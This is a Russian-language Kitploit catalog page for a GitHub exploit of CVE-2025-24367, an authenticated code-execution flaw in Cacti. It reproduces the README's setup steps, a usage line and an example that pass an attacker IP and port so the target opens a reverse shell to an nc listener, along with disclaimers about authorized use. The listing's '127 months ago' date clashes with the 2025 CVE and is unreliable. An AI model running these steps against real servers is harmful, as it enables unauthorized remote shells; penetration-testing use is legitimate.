Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24367 — Эксплойт аутентифицированного удаленного выполнения кода для уязвимости шаблона графика Cacti, с полезной нагрузкой reverse shell и поддержкой прокси для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/shoshinmaster/cve-2025-24367
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

Эксплойт аутентифицированного удаленного выполнения кода для уязвимости шаблона графика Cacti, с полезной нагрузкой reverse shell и поддержкой прокси для авторизованного тестирования на проникновение.

Репозиторий
127 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24367 - Выполнение кода через аутентифицированный Graph Template в Cacti

Использование и безопасность

Важно — прочтите это сначала:
Этот репозиторий и exploit.py предоставлены только для образовательных и исследовательских целей. Не используйте этот код против систем, сетей или сервисов, на которые у вас нет явного, письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Используя этот код, вы соглашаетесь соблюдать применимые законы и правила вашего учреждения.


Требования

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Использование

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

Пример

Перед запуском скрипта убедитесь, что у вас запущен nc listener. Запускайте скрипт без proxy, если только не выполняете отладку:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

ОЧЕНЬ ВАЖНЫЕ ПРЕДУПРЕЖДЕНИЯ

  • Не запускайте это против производственных систем или любых систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
  • Всегда получайте письменное разрешение перед проведением тестирования безопасности.
  • Используйте изолированные лабораторные среды (например, виртуальные машины, контейнеры или специально созданные тестовые сети) для экспериментов.
  • В вашей организации могут действовать политики отчетности и раскрытия информации — соблюдайте их.
  • Авторы не несут ответственности за неправомерное использование этого кода.

Последнее напоминание: Этот скрипт и README предназначены только для образовательных целей. Никогда не используйте эти инструменты для незаконного доступа к системам.

Скачать инструмент